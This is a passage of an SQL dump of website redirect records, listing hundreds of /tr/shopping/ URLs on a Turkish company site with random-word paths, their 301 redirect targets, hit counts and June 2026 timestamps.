00:00:00',301),(68198,'https://3s-technologies.com.tr/tr/shopping/strathspey/2376159576.html',NULL,'https://3s-technologies.com.tr/shopping/strathspey/2376159576.html','',1,0,'2026-06-10 23:55:02','0000-00-00 00:00:00',301),(68199,'https://3s-technologies.com.tr/tr/shopping/stopper/3873878250.html',NULL,'https://3s-technologies.com.tr/shopping/stopper/3873878250.html','',1,0,'2026-06-10 23:55:04','0000-00-00 00:00:00',301),(68200,'https://3s-technologies.com.tr/tr/shopping/taeniada/3513987443.html',NULL,'https://3s-technologies.com.tr/shopping/taeniada/3513987443.html','',1,0,'2026-06-10 23:55:07','0000-00-00 00:00:00',301),(68201,'https://3s-technologies.com.tr/tr/shopping/guideless/126250591.html',NULL,'https://3s-technologies.com.tr/shopping/guideless/126250591.html','',1,0,'2026-06-10 23:55:10','0000-00-00 00:00:00',301),(68202,'https://3s-technologies.com.tr/tr/shopping/vellon/3317822224.html',NULL,'https://3s-technologies.com.tr/shopping/vellon/3317822224.html','',1,0,'2026-06-10 23:55:13','0000-00-00 00:00:00',301),(68203,'https://3s-technologies.com.tr/tr/shopping/tersulphide/2645416397.html',NULL,'https://3s-technologies.com.tr/shopping/tersulphide/2645416397.html','',1,0,'2026-06-10 23:55:16','0000-00-00 00:00:00',301),(68204,'https://3s-technologies.com.tr/tr/shopping/recitatively/3832858390.html',NULL,'https://3s-technologies.com.tr/shopping/recitatively/3832858390.html','',1,0,'2026-06-10 23:55:19','0000-00-00 00:00:00',301),(68205,'https://3s-technologies.com.tr/tr/shopping/molded/2892148249.html',NULL,'https://3s-technologies.com.tr/shopping/molded/2892148249.html','',1,0,'2026-06-10 23:55:22','0000-00-00 00:00:00',301),(68206,'https://3s-technologies.com.tr/tr/shopping/aleconner/559594594.html',NULL,'https://3s-technologies.com.tr/shopping/aleconner/559594594.html','',1,0,'2026-06-10 23:55:25','0000-00-00 00:00:00',301),(68207,'https://3s-technologies.com.tr/tr/shopping/luvaridae/3601220901.html',NULL,'https://3s-technologies.com.tr/shopping/luvaridae/3601220901.html','',1,0,'2026-06-10 23:55:28','0000-00-00 00:00:00',301),(68208,'https://3s-technologies.com.tr/tr/shopping/acarpellous/1129041580.html',NULL,'https://3s-technologies.com.tr/shopping/acarpellous/1129041580.html','',1,0,'2026-06-10 23:55:31','0000-00-00 00:00:00',301),(68209,'http://3s-technologies.com.tr/tr/shopping/lovelorn/3686014924.html',NULL,'','',2,0,'2026-06-10 23:55:33','0000-00-00 00:00:00',301),(68210,'https://3s-technologies.com.tr/tr/shopping/retistene/2964060101.html',NULL,'https://3s-technologies.com.tr/shopping/retistene/2964060101.html','',1,0,'2026-06-10 23:55:34','0000-00-00 00:00:00',301),(68211,'https://3s-technologies.com.tr/tr/shopping/miridae/37459692.html',NULL,'https://3s-technologies.com.tr/shopping/miridae/37459692.html','',1,0,'2026-06-10 23:55:37','0000-00-00 00:00:00',301),(68212,'https://3s-technologies.com.tr/tr/shopping/enfree/384887424.html',NULL,'https://3s-technologies.com.tr/shopping/enfree/384887424.html','',1,0,'2026-06-10 23:55:40','0000-00-00 00:00:00',301),(68213,'https://3s-technologies.com.tr/tr/shopping/heresies/3757104567.html',NULL,'https://3s-technologies.com.tr/shopping/heresies/3757104567.html','',1,0,'2026-06-10 23:55:43','0000-00-00 00:00:00',301),(68214,'https://3s-technologies.com.tr/tr/shopping/persuasibility/526677680.html',NULL,'https://3s-technologies.com.tr/shopping/persuasibility/526677680.html','',1,0,'2026-06-10 23:55:46','0000-00-00 00:00:00',301),(68215,'https://3s-technologies.com.tr/tr/shopping/trenail/2179863215.html',NULL,'https://3s-technologies.com.tr/shopping/trenail/2179863215.html','',1,0,'2026-06-10 23:55:49','0000-00-00 00:00:00',301),(68216,'https://3s-technologies.com.tr/tr/shopping/cranny/3577901453.html',NULL,'https://3s-technologies.com.tr/shopping/cranny/3577901453.html','',1,0,'2026-06-10 23:55:52','0000-00-00 00:00:00',301),(68217,'https://3s-technologies.com.tr/tr/shopping/mowyer/2864501820.html',NULL,'https://3s-technologies.com.tr/shopping/mowyer/2864501820.html','',1,0,'2026-06-10 23:56:03','0000-00-00 00:00:00',301),(68218,'http://3s-technologies.com.tr/tr/shopping/rotary/4235450929.html',NULL,'','',1,0,'2026-06-10 23:56:03','0000-00-00 00:00:00',301),(68219,'https://3s-technologies.com.tr/tr/shopping/pholades/1042666353.html',NULL,'https://3s-technologies.com.tr/shopping/pholades/1042666353.html','',1,0,'2026-06-10 23:56:04','0000-00-00 00:00:00',301),(68220,'https://3s-technologies.com.tr/tr/shopping/fragmentarily/4222127331.html',NULL,'https://3s-technologies.com.tr/shopping/fragmentarily/4222127331.html','',1,0,'2026-06-10 23:56:07','0000-00-00 00:00:00',301),(68221,'https://3s-technologies.com.tr/tr/shopping/parousia/2040097866.html',NULL,'https://3s-technologies.com.tr/shopping/parousia/2040097866.html','',1,0,'2026-06-10 23:56:10','0000-00-00 00:00:00',301),(68222,'https://3s-technologies.com.tr/tr/shopping/coltishness/3760555804.html',NULL,'https://3s-technologies.com.tr/shopping/coltishness/3760555804.html','',1,0,'2026-06-10 23:56:13','0000-00-00 00:00:00',301),(68223,'https://3s-technologies.com.tr/tr/shopping/favosites/3988578533.html',NULL,'https://3s-technologies.com.tr/shopping/favosites/3988578533.html','',1,0,'2026-06-10 23:56:16','0000-00-00 00:00:00',301),(68224,'https://3s-technologies.com.tr/tr/shopping/sufficiently/1516750881.html',NULL,'https://3s-technologies.com.tr/shopping/sufficiently/1516750881.html','',1,0,'2026-06-10 23:56:19','0000-00-00 00:00:00',301),(68225,'https://3s-technologies.com.tr/tr/shopping/unbendingly/1705778688.html',NULL,'https://3s-technologies.com.tr/shopping/unbendingly/1705778688.html','',1,0,'2026-06-10 23:56:22','0000-00-00 00:00:00',301),(68226,'https://3s-technologies.com.tr/tr/shopping/timpani/652792462.html',NULL,'https://3s-technologies.com.tr/shopping/timpani/652792462.html','',1,0,'2026-06-10 23:56:25','0000-00-00 00:00:00',301),(68227,'http://3s-technologies.com.tr/tr/shopping/agaragar/3931371170.html',NULL,'','',2,0,'2026-06-10 23:56:27','0000-00-00 00:00:00',301),(68228,'https://3s-technologies.com.tr/tr/shopping/turret/3856359673.html',NULL,'https://3s-technologies.com.tr/shopping/turret/3856359673.html','',1,0,'2026-06-10 23:56:28','0000-00-00 00:00:00',301),(68229,'https://3s-technologies.com.tr/tr/shopping/zareba/2464377922.html',NULL,'https://3s-technologies.com.tr/shopping/zareba/2464377922.html','',1,0,'2026-06-10 23:56:31','0000-00-00 00:00:00',301),(68230,'https://3s-technologies.com.tr/tr/shopping/overcredulous/2058828558.html',NULL,'https://3s-technologies.com.tr/shopping/overcredulous/2058828558.html','',1,0,'2026-06-10 23:56:34','0000-00-00 00:00:00',301),(68231,'https://3s-technologies.com.tr/tr/shopping/pluteal/1160324322.html',NULL,'https://3s-technologies.com.tr/shopping/pluteal/1160324322.html','',1,0,'2026-06-10 23:56:37','0000-00-00 00:00:00',301),(68232,'https://3s-technologies.com.tr/tr/shopping/infanticide/2688838886.html',NULL,'https://3s-technologies.com.tr/shopping/infanticide/2688838886.html','',1,0,'2026-06-10 23:56:40','0000-00-00 00:00:00',301),(68233,'https://3s-technologies.com.tr/tr/shopping/thoracentesis/966216374.html',NULL,'https://3s-technologies.com.tr/shopping/thoracentesis/966216374.html','',1,0,'2026-06-10 23:56:44','0000-00-00 00:00:00',301),(68234,'https://3s-technologies.com.tr/tr/shopping/rearing/2339172048.html',NULL,'https://3s-technologies.com.tr/shopping/rearing/2339172048.html','',1,0,'2026-06-10 23:56:46','0000-00-00 00:00:00',301),(68235,'https://3s-technologies.com.tr/tr/shopping/pupas/2107648173.html',NULL,'https://3s-technologies.com.tr/shopping/pupas/2107648173.html','',1,0,'2026-06-10 23:56:49','0000-00-00 00:00:00',301),(68236,'http://3s-technologies.com.tr/tr/shopping/friskiness/2628832859.html',NULL,'','',1,0,'2026-06-10 23:56:52','0000-00-00 00:00:00',301),(68237,'https://3s-technologies.com.tr/tr/shopping/circumduce/4142086495.html',NULL,'https://3s-technologies.com.tr/shopping/circumduce/4142086495.html','',1,0,'2026-06-10 23:56:52','0000-00-00 00:00:00',301),(68238,'https://3s-technologies.com.tr/tr/shopping/pellagrous/2619327393.html',NULL,'https://3s-technologies.com.tr/shopping/pellagrous/2619327393.html','',1,0,'2026-06-10 23:56:56','0000-00-00 00:00:00',301),(68239,'https://3s-technologies.com.tr/tr/shopping/camphora/3407252653.html',NULL,'https://3s-technologies.com.tr/shopping/camphora/3407252653.html','',1,0,'2026-06-10 23:57:04','0000-00-00 00:00:00',301),(68240,'https://3s-technologies.com.tr/tr/shopping/soupy/2515785242.html',NULL,'https://3s-technologies.com.tr/shopping/soupy/2515785242.html','',1,0,'2026-06-10 23:57:08','0000-00-00 00:00:00',301),(68241,'https://3s-technologies.com.tr/tr/shopping/antennule/2387713759.html',NULL,'https://3s-technologies.com.tr/shopping/antennule/2387713759.html','',1,0,'2026-06-10 23:57:11','0000-00-00 00:00:00',301),(68242,'https://3s-technologies.com.tr/tr/shopping/races/1520127570.html',NULL,'https://3s-technologies.com.tr/shopping/races/1520127570.html','',1,0,'2026-06-10 23:57:14','0000-00-00 00:00:00',301),(68243,'https://3s-technologies.com.tr/tr/shopping/misallied/2529504015.html',NULL,'https://3s-technologies.com.tr/shopping/misallied/2529504015.html','',1,0,'2026-06-10 23:57:17','0000-00-00 00:00:00',301),(68244,'https://3s-technologies.com.tr/tr/shopping/randon/1011217889.html',NULL,'https://3s-technologies.com.tr/shopping/randon/1011217889.html','',1,0,'2026-06-10 23:57:20','0000-00-00 00:00:00',301),(68245,'https://3s-technologies.com.tr/tr/shopping/petaline/3508023033.html',NULL,'https://3s-technologies.com.tr/shopping/petaline/3508023033.html','',1,0,'2026-06-10 23:57:23','0000-00-00 00:00:00',301),(68246,'https://3s-technologies.com.tr/tr/shopping/browny/139182563.html',NULL,'https://3s-technologies.com.tr/shopping/browny/139182563.html','',1,0,'2026-06-10 23:57:26','0000-00-00 00:00:00',301),(68247,'https://3s-technologies.com.tr/tr/shopping/guessive/3122156835.html',NULL,'https://3s-technologies.com.tr/shopping/guessive/3122156835.html','',1,0,'2026-06-10 23:57:29','0000-00-00 00:00:00',301),(68248,'https://3s-technologies.com.tr/tr/shopping/bacharach/2711387694.html',NULL,'https://3s-technologies.com.tr/shopping/bacharach/2711387694.html','',1,0,'2026-06-10 23:57:32','0000-00-00 00:00:00',301),(68249,'https://3s-technologies.com.tr/tr/shopping/sternforemost/1499232304.html',NULL,'https://3s-technologies.com.tr/shopping/sternforemost/1499232304.html','',1,0,'2026-06-10 23:57:35','0000-00-00 00:00:00',301),(68250,'https://3s-technologies.com.tr/tr/shopping/wheyish/3878467054.html',NULL,'https://3s-technologies.com.tr/shopping/wheyish/3878467054.html','',1,0,'2026-06-10 23:57:38','0000-00-00 00:00:00',301),(68251,'https://3s-technologies.com.tr/tr/shopping/adipescent/2080165235.html',NULL,'https://3s-technologies.com.tr/shopping/adipescent/2080165235.html','',1,0,'2026-06-10 23:57:41','0000-00-00 00:00:00',301),(68252,'https://3s-technologies.com.tr/tr/shopping/feloniousness/3732227678.html',NULL,'https://3s-technologies.com.tr/shopping/feloniousness/3732227678.html','',1,0,'2026-06-10 23:57:44','0000-00-00 00:00:00',301),(68253,'https://3s-technologies.com.tr/tr/shopping/fagoted/3049474311.html',NULL,'https://3s-technologies.com.tr/shopping/fagoted/3049474311.html','',1,0,'2026-06-10 23:57:47','0000-00-00 00:00:00',301),(68254,'https://3s-technologies.com.tr/tr/shopping/eternalize/3836235079.html',NULL,'https://3s-technologies.com.tr/shopping/eternalize/3836235079.html','',1,0,'2026-06-10 23:57:50','0000-00-00 00:00:00',301),(68255,'https://3s-technologies.com.tr/tr/shopping/thraldom/4211574133.html',NULL,'https://3s-technologies.com.tr/shopping/thraldom/4211574133.html','',1,0,'2026-06-10 23:57:53','0000-00-00 00:00:00',301),(68256,'https://3s-technologies.com.tr/tr/shopping/hipshot/2421982424.html',NULL,'https://3s-technologies.com.tr/shopping/hipshot/2421982424.html','',1,0,'2026-06-10 23:57:56','0000-00-00 00:00:00',301),(68257,'https://3s-technologies.com.tr/tr/shopping/extraparochial/827802807.html',NULL,'https://3s-technologies.com.tr/shopping/extraparochial/827802807.html','',1,0,'2026-06-10 23:57:59','0000-00-00 00:00:00',301),(68258,'https://3s-technologies.com.tr/tr/shopping/handmaiden/4123355819.html',NULL,'https://3s-technologies.com.tr/shopping/handmaiden/4123355819.html','',1,0,'2026-06-10 23:58:02','0000-00-00 00:00:00',301),(68259,'https://3s-technologies.com.tr/tr/shopping/disguised/2640827593.html',NULL,'https://3s-technologies.com.tr/shopping/disguised/2640827593.html','',1,0,'2026-06-10 23:58:05','0000-00-00 00:00:00',301),(68260,'https://3s-technologies.com.tr/tr/shopping/mufti/3962653068.html',NULL,'https://3s-technologies.com.tr/shopping/mufti/3962653068.html','',1,0,'2026-06-10 23:58:08','0000-00-00 00:00:00',301),(68261,'https://3s-technologies.com.tr/tr/shopping/cataphractus/3106013880.html',NULL,'https://3s-technologies.com.tr/shopping/cataphractus/3106013880.html','',1,0,'2026-06-10 23:58:11','0000-00-00 00:00:00',301),(68262,'https://3s-technologies.com.tr/tr/shopping/doubletongued/2735659649.html',NULL,'https://3s-technologies.com.tr/shopping/doubletongued/2735659649.html','',1,0,'2026-06-10 23:58:14','0000-00-00 00:00:00',301),(68263,'https://3s-technologies.com.tr/tr/shopping/untowardness/2417393636.html',NULL,'https://3s-technologies.com.tr/shopping/untowardness/2417393636.html','',1,0,'2026-06-10 23:58:17','0000-00-00 00:00:00',301),(68264,'https://3s-technologies.com.tr/tr/shopping/ordure/3298909729.html',NULL,'https://3s-technologies.com.tr/shopping/ordure/3298909729.html','',1,0,'2026-06-10 23:58:20','0000-00-00 00:00:00',301),(68265,'https://3s-technologies.com.tr/tr/shopping/identic/630685081.html',NULL,'https://3s-technologies.com.tr/shopping/identic/630685081.html','',1,0,'2026-06-10 23:58:23','0000-00-00 00:00:00',301),(68266,'https://3s-technologies.com.tr/tr/shopping/noticer/1576287217.html',NULL,'https://3s-technologies.com.tr/shopping/noticer/1576287217.html','',1,0,'2026-06-10 23:58:27','0000-00-00 00:00:00',301),(68267,'https://3s-technologies.com.tr/tr/shopping/overgreat/1985541084.html',NULL,'https://3s-technologies.com.tr/shopping/overgreat/1985541084.html','',1,0,'2026-06-10 23:58:29','0000-00-00 00:00:00',301),(68268,'https://3s-technologies.com.tr/tr/shopping/kingtruss/2608592360.html',NULL,'https://3s-technologies.com.tr/shopping/kingtruss/2608592360.html','',1,0,'2026-06-10 23:58:32','0000-00-00 00:00:00',301),(68269,'https://3s-technologies.com.tr/tr/shopping/spongilla/3788809382.html',NULL,'https://3s-technologies.com.tr/shopping/spongilla/3788809382.html','',1,0,'2026-06-10 23:58:35','0000-00-00 00:00:00',301),(68270,'https://3s-technologies.com.tr/tr/shopping/phytophaga/95783913.html',NULL,'https://3s-technologies.com.tr/shopping/phytophaga/95783913.html','',1,0,'2026-06-10 23:58:38','0000-00-00 00:00:00',301),(68271,'https://3s-technologies.com.tr/tr/shopping/druidic/1514326683.html',NULL,'https://3s-technologies.com.tr/shopping/druidic/1514326683.html','',1,0,'2026-06-10 23:58:41','0000-00-00 00:00:00',301),(68272,'https://3s-technologies.com.tr/tr/shopping/muscipula/1773101736.html',NULL,'https://3s-technologies.com.tr/shopping/muscipula/1773101736.html','',1,0,'2026-06-10 23:58:44','0000-00-00 00:00:00',301),(68273,'https://3s-technologies.com.tr/tr/shopping/irreconciliation/1417979337.html',NULL,'https://3s-technologies.com.tr/shopping/irreconciliation/1417979337.html','',1,0,'2026-06-10 23:58:47','0000-00-00 00:00:00',301),(68274,'https://3s-technologies.com.tr/tr/shopping/boswellism/648203658.html',NULL,'https://3s-technologies.com.tr/shopping/boswellism/648203658.html','',1,0,'2026-06-10 23:58:50','0000-00-00 00:00:00',301),(68275,'https://3s-technologies.com.tr/tr/shopping/stammered/179249948.html',NULL,'https://3s-technologies.com.tr/shopping/stammered/179249948.html','',1,0,'2026-06-10 23:58:53','0000-00-00 00:00:00',301),(68276,'https://3s-technologies.com.tr/tr/shopping/cultivable/1860498733.html',NULL,'https://3s-technologies.com.tr/shopping/cultivable/1860498733.html','',1,0,'2026-06-10 23:58:56','0000-00-00 00:00:00',301),(68277,'https://3s-technologies.com.tr/tr/shopping/vibrancy/1061578848.html',NULL,'https://3s-technologies.com.tr/shopping/vibrancy/1061578848.html','',1,0,'2026-06-10 23:58:59','0000-00-00 00:00:00',301),(68278,'https://3s-technologies.com.tr/tr/shopping/parisian/109502686.html',NULL,'https://3s-technologies.com.tr/shopping/parisian/109502686.html','',1,0,'2026-06-10 23:59:02','0000-00-00 00:00:00',301),(68279,'https://3s-technologies.com.tr/tr/shopping/ardens/1475516805.html',NULL,'https://3s-technologies.com.tr/shopping/ardens/1475516805.html','',1,0,'2026-06-10 23:59:05','0000-00-00 00:00:00',301),(68280,'https://3s-technologies.com.tr/tr/shopping/unbosom/3511399722.html',NULL,'https://3s-technologies.com.tr/shopping/unbosom/3511399722.html','',1,0,'2026-06-10 23:59:08','0000-00-00 00:00:00',301),(68281,'http://3s-technologies.com.tr/tr/shopping/pinus/1183385022.html',NULL,'','',2,0,'2026-06-10 23:59:10','0000-00-00 00:00:00',301),(68282,'https://3s-technologies.com.tr/tr/shopping/anastomose/3071581692.html',NULL,'https://3s-technologies.com.tr/shopping/anastomose/3071581692.html','',1,0,'2026-06-10 23:59:11','0000-00-00 00:00:00',301),(68283,'http://3s-technologies.com.tr/tr/shopping/shahin/1558164518.html',NULL,'','',1,0,'2026-06-10 23:59:14','0000-00-00 00:00:00',301),(68284,'http://3s-technologies.com.tr/tr/shopping/oscillative/164060312.html',NULL,'','',1,0,'2026-06-10 23:59:16','0000-00-00 00:00:00',301),(68285,'http://3s-technologies.com.tr/tr/shopping/spectacle/4013014855.html',NULL,'','',1,0,'2026-06-10 23:59:19','0000-00-00 00:00:00',301),(68286,'https://3s-technologies.com.tr/tr/shopping/motherofthyme/2416181553.html',NULL,'https://3s-technologies.com.tr/shopping/motherofthyme/2416181553.html','',1,0,'2026-06-10 23:59:20','0000-00-00 00:00:00',301),(68287,'http://3s-technologies.com.tr/tr/shopping/annominate/3268839914.html',NULL,'','',2,0,'2026-06-10 23:59:22','0000-00-00 00:00:00',301),(68288,'https://3s-technologies.com.tr/tr/shopping/revirescence/3639029810.html',NULL,'https://3s-technologies.com.tr/shopping/revirescence/3639029810.html','',1,0,'2026-06-10 23:59:24','0000-00-00 00:00:00',301),(68289,'https://3s-technologies.com.tr/tr/shopping/incrusted/1026359859.html',NULL,'https://3s-technologies.com.tr/shopping/incrusted/1026359859.html','',1,0,'2026-06-10 23:59:27','0000-00-00 00:00:00',301),(68290,'http://3s-technologies.com.tr/tr/shopping/eightvo/2056405188.html',NULL,'','',1,0,'2026-06-10 23:59:27','0000-00-00 00:00:00',301),(68291,'https://3s-technologies.com.tr/tr/shopping/derogatorily/3997708502.html',NULL,'https://3s-technologies.com.tr/shopping/derogatorily/3997708502.html','',1,0,'2026-06-10 23:59:30','0000-00-00 00:00:00',301),(68292,'https://3s-technologies.com.tr/tr/shopping/peloria/2001076874.html',NULL,'https://3s-technologies.com.tr/shopping/peloria/2001076874.html','',1,0,'2026-06-10 23:59:33','0000-00-00 00:00:00',301),(68293,'https://3s-technologies.com.tr/tr/shopping/apocalyptist/2560395991.html',NULL,'https://3s-technologies.com.tr/shopping/apocalyptist/2560395991.html','',1,0,'2026-06-10 23:59:40','0000-00-00 00:00:00',301),(68294,'https://3s-technologies.com.tr/tr/shopping/kalantas/2487272040.html',NULL,'https://3s-technologies.com.tr/shopping/kalantas/2487272040.html','',1,0,'2026-06-10 23:59:42','0000-00-00 00:00:00',301),(68295,'https://3s-technologies.com.tr/tr/shopping/ophthalmia/985899541.html',NULL,'https://3s-technologies.com.tr/shopping/ophthalmia/985899541.html','',1,0,'2026-06-10 23:59:45','0000-00-00 00:00:00',301),(68296,'https://3s-technologies.com.tr/tr/shopping/salvershaped/2620702999.html',NULL,'https://3s-technologies.com.tr/shopping/salvershaped/2620702999.html','',1,0,'2026-06-10 23:59:48','0000-00-00 00:00:00',301),(68297,'https://3s-technologies.com.tr/tr/shopping/metallophone/1246118438.html',NULL,'https://3s-technologies.com.tr/shopping/metallophone/1246118438.html','',1,0,'2026-06-10 23:59:51','0000-00-00 00:00:00',301),(68298,'https://3s-technologies.com.tr/tr/shopping/gangrened/2082934775.html',NULL,'https://3s-technologies.com.tr/shopping/gangrened/2082934775.html','',1,0,'2026-06-10 23:59:54','0000-00-00 00:00:00',301),(68299,'https://3s-technologies.com.tr/tr/shopping/micaceocalcareous/3178316498.html',NULL,'https://3s-technologies.com.tr/shopping/micaceocalcareous/3178316498.html','',1,0,'2026-06-10 23:59:57','0000-00-00 00:00:00',301),(68300,'https://3s-technologies.com.tr/tr/shopping/atellan/2056404344.html',NULL,'https://3s-technologies.com.tr/shopping/atellan/2056404344.html','',1,0,'2026-06-11 00:00:00','0000-00-00 00:00:00',301),(68301,'https://3s-technologies.com.tr/tr/shopping/slaggy/2321212044.html',NULL,'https://3s-technologies.com.tr/shopping/slaggy/2321212044.html','',1,0,'2026-06-11 00:00:03','0000-00-00 00:00:00',301),(68302,'https://3s-technologies.com.tr/tr/shopping/deutosulphuret/2634863199.html',NULL,'https://3s-technologies.com.tr/shopping/deutosulphuret/2634863199.html','',1,0,'2026-06-11 00:00:06','0000-00-00 00:00:00',301),(68303,'https://3s-technologies.com.tr/tr/shopping/suavastika/3290780713.html',NULL,'https://3s-technologies.com.tr/shopping/suavastika/3290780713.html','',1,0,'2026-06-11 00:00:09','0000-00-00 00:00:00',301),(68304,'https://3s-technologies.com.tr/tr/shopping/laumontite/3102473668.html',NULL,'https://3s-technologies.com.tr/shopping/laumontite/3102473668.html','',1,0,'2026-06-11 00:00:12','0000-00-00 00:00:00',301),(68305,'https://3s-technologies.com.tr/tr/shopping/ghoulish/3402663849.html',NULL,'https://3s-technologies.com.tr/shopping/ghoulish/3402663849.html','',1,0,'2026-06-11 00:00:15','0000-00-00 00:00:00',301),(68306,'https://3s-technologies.com.tr/tr/shopping/repristination/3637817711.html',NULL,'https://3s-technologies.com.tr/shopping/repristination/3637817711.html','',1,0,'2026-06-11 00:00:18','0000-00-00 00:00:00',301),(68307,'https://3s-technologies.com.tr/tr/shopping/unquietly/2035509078.html',NULL,'https://3s-technologies.com.tr/shopping/unquietly/2035509078.html','',1,0,'2026-06-11 00:00:21','0000-00-00 00:00:00',301),(68308,'https://3s-technologies.com.tr/tr/shopping/apostasies/1372977854.html',NULL,'https://3s-technologies.com.tr/shopping/apostasies/1372977854.html','',1,0,'2026-06-11 00:00:24','0000-00-00 00:00:00',301),(68309,'https://3s-technologies.com.tr/tr/shopping/bullism/2693427674.html',NULL,'https://3s-technologies.com.tr/shopping/bullism/2693427674.html','',1,0,'2026-06-11 00:00:27','0000-00-00 00:00:00',301),(68310,'https://3s-technologies.com.tr/tr/shopping/butadiene/1494643516.html',NULL,'https://3s-technologies.com.tr/shopping/butadiene/1494643516.html','',1,0,'2026-06-11 00:00:30','0000-00-00 00:00:00',301),(68311,'https://3s-technologies.com.tr/tr/shopping/uckewallist/3525541610.html',NULL,'https://3s-technologies.com.tr/shopping/uckewallist/3525541610.html','',1,0,'2026-06-11 00:00:33','0000-00-00 00:00:00',301),(68312,'https://3s-technologies.com.tr/tr/shopping/rooky/1203768380.html',NULL,'https://3s-technologies.com.tr/shopping/rooky/1203768380.html','',1,0,'2026-06-11 00:00:36','0000-00-00 00:00:00',301),(68313,'https://3s-technologies.com.tr/tr/shopping/felanders/2837805651.html',NULL,'https://3s-technologies.com.tr/shopping/felanders/2837805651.html','',1,0,'2026-06-11 00:00:39','0000-00-00 00:00:00',301),(68314,'https://3s-technologies.com.tr/tr/shopping/epipterygoid/3402500326.html',NULL,'https://3s-technologies.com.tr/shopping/epipterygoid/3402500326.html','',1,0,'2026-06-11 00:00:42','0000-00-00 00:00:00',301),(68315,'https://3s-technologies.com.tr/tr/shopping/anguineous/2959471329.html',NULL,'https://3s-technologies.com.tr/shopping/anguineous/2959471329.html','',1,0,'2026-06-11 00:00:45','0000-00-00 00:00:00',301),(68316,'https://3s-technologies.com.tr/tr/shopping/avianise/3362692565.html',NULL,'https://3s-technologies.com.tr/shopping/avianise/3362692565.html','',1,0,'2026-06-11 00:00:48','0000-00-00 00:00:00',301),(68317,'https://3s-technologies.com.tr/tr/shopping/aliquant/2806750136.html',NULL,'https://3s-technologies.com.tr/shopping/aliquant/2806750136.html','',1,0,'2026-06-11 00:00:51','0000-00-00 00:00:00',301),(68318,'https://3s-technologies.com.tr/tr/shopping/antimonii/3224278998.html',NULL,'https://3s-technologies.com.tr/shopping/antimonii/3224278998.html','',1,0,'2026-06-11 00:00:54','0000-00-00 00:00:00',301),(68319,'https://3s-technologies.com.tr/tr/shopping/theanthropy/3031773931.html',NULL,'https://3s-technologies.com.tr/shopping/theanthropy/3031773931.html','',1,0,'2026-06-11 00:01:01','0000-00-00 00:00:00',301),(68320,'https://3s-technologies.com.tr/tr/shopping/psychology/194795125.html',NULL,'https://3s-technologies.com.tr/shopping/psychology/194795125.html','',1,0,'2026-06-11 00:01:03','0000-00-00 00:00:00',301),(68321,'https://3s-technologies.com.tr/tr/shopping/christlikeness/3569378617.html',NULL,'https://3s-technologies.com.tr/shopping/christlikeness/3569378617.html','',1,0,'2026-06-11 00:01:06','0000-00-00 00:00:00',301),(68322,'http://3s-technologies.com.tr/tr/shopping/corroboration/3253745551.html',NULL,'','',1,0,'2026-06-11 00:01:21','0000-00-00 00:00:00',301),(68323,'http://3s-technologies.com.tr/tr/shopping/colluctation/1448216562.html',NULL,'','',1,0,'2026-06-11 00:01:24','0000-00-00 00:00:00',301),(68324,'http://3s-technologies.com.tr/tr/shopping/excerebration/2586044428.html',NULL,'','',2,0,'2026-06-11 00:01:27','0000-00-00 00:00:00',301),(68325,'http://3s-technologies.com.tr/tr/shopping/sappodilla/4272930577.html',NULL,'','',1,0,'2026-06-11 00:01:32','0000-00-00 00:00:00',301),(68326,'http://3s-technologies.com.tr/tr/shopping/sphecidae/333922343.html',NULL,'','',1,0,'2026-06-11 00:01:34','0000-00-00 00:00:00',301),(68327,'http://3s-technologies.com.tr/tr/shopping/aftward/2023350805.html',NULL,'','',1,0,'2026-06-11 00:01:37','0000-00-00 00:00:00',301),(68328,'https://3s-technologies.com.tr/tr/shopping/unzoned/4294429949.html',NULL,'https://3s-technologies.com.tr/shopping/unzoned/4294429949.html','',1,0,'2026-06-11 00:01:37','0000-00-00 00:00:00',301),(68329,'https://3s-technologies.com.tr/tr/shopping/unbottomed/3182905270.html',NULL,'https://3s-technologies.com.tr/shopping/unbottomed/3182905270.html','',1,0,'2026-06-11 00:03:15','0000-00-00 00:00:00',301),(68330,'https://3s-technologies.com.tr/tr/shopping/glissette/2341336638.html',NULL,'https://3s-technologies.com.tr/shopping/glissette/2341336638.html','',1,0,'2026-06-11 00:03:29','0000-00-00 00:00:00',301),(68331,'http://3s-technologies.com.tr/tr/shopping/giaour/3592602840.html',NULL,'','',1,0,'2026-06-11 00:03:29','0000-00-00 00:00:00',301),(68332,'http://3s-technologies.com.tr/tr/shopping/raffaelesque/3472149293.html',NULL,'','',2,0,'2026-06-11 00:03:47','0000-00-00 00:00:00',301),(68333,'https://3s-technologies.com.tr/tr/shopping/sacramentarian/1697649672.html',NULL,'https://3s-technologies.com.tr/shopping/sacramentarian/1697649672.html','',1,0,'2026-06-11 00:03:52','0000-00-00 00:00:00',301),(68334,'http://3s-technologies.com.tr/tr/shopping/dilemma/2478308653.html',NULL,'','',2,0,'2026-06-11 00:03:54','0000-00-00 00:00:00',301),(68335,'http://3s-technologies.com.tr/tr/shopping/snowcapped/1481273128.html',NULL,'','',2,0,'2026-06-11 00:04:11','0000-00-00 00:00:00',301),(68336,'https://3s-technologies.com.tr/tr/shopping/ophioglossum/2015220977.html',NULL,'https://3s-technologies.com.tr/shopping/ophioglossum/2015220977.html','',1,0,'2026-06-11 00:04:28','0000-00-00 00:00:00',301),(68337,'http://3s-technologies.com.tr/tr/shopping/dasypeltis/2322424987.html',NULL,'','',2,0,'2026-06-11 00:04:31','0000-00-00 00:00:00',301),(68338,'https://3s-technologies.com.tr/tr/shopping/clerkship/1229811960.html',NULL,'https://3s-technologies.com.tr/shopping/clerkship/1229811960.html','',1,0,'2026-06-11 00:04:32','0000-00-00 00:00:00',301),(68339,'http://3s-technologies.com.tr/tr/shopping/phyllophagan/505178292.html',NULL,'','',1,0,'2026-06-11 00:04:36','0000-00-00 00:00:00',301),(68340,'https://3s-technologies.com.tr/tr/shopping/saintsimonian/4068571794.html',NULL,'https://3s-technologies.com.tr/shopping/saintsimonian/4068571794.html','',1,0,'2026-06-11 00:04:40','0000-00-00 00:00:00',301),(68341,'https://3s-technologies.com.tr/tr/shopping/satyric/2128543439.html',NULL,'https://3s-technologies.com.tr/shopping/satyric/2128543439.html','',1,0,'2026-06-11 00:04:42','0000-00-00 00:00:00',301),(68342,'http://3s-technologies.com.tr/tr/shopping/seashell/4175143921.html',NULL,'','',2,0,'2026-06-11 00:06:39','0000-00-00 00:00:00',301),(68343,'http://3s-technologies.com.tr/tr/shopping/lobular/2589421117.html',NULL,'','',2,0,'2026-06-11 00:06:43','0000-00-00 00:00:00',301),(68344,'http://3s-technologies.com.tr/tr/shopping/albogularis/336691899.html',NULL,'','',1,0,'2026-06-11 00:06:46','0000-00-00 